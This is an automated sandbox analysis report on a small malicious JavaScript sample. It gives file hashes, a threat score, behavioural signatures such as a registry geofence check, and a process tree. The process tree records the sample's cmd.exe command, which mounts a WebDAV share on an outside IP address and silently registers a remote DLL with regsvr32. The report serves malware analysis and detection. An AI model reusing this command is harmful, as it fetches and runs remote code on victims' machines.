Analysis
-
max time kernel
149s -
max time network
160s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21/07/2024, 15:45
Static task
static1
Behavioral task
behavioral1
Sample
20165240273081030282.js
Resource
win7-20240704-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
20165240273081030282.js
Resource
win10v2004-20240709-en
5 signatures
150 seconds
General
-
Target
20165240273081030282.js
-
Size
3KB
-
MD5
50ddfee563ab4aac8262d5af215e3654
-
SHA1
768d954fd9777b5df6934782dcfd4cebf7f6f620
-
SHA256
873f260f38acc2720a5c9f975efd22e048b1fed9833b8c8deb07ce9dd7d772d5
-
SHA512
081aa9e38b1e5ccac7c39cd75235ffae8076dccfbeb00764276fcd540abb067bcce57e35c1aac9d01ebad339d5e81d091ade954cc1d4f0822e30ed7aee224224
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2864 wrote to memory of 2044 2864 wscript.exe 84 PID 2864 wrote to memory of 2044 2864 wscript.exe 84 PID 2044 wrote to memory of 2080 2044 cmd.exe 86 PID 2044 wrote to memory of 2080 2044 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\20165240273081030282.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\69061822325566.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:2080
-
-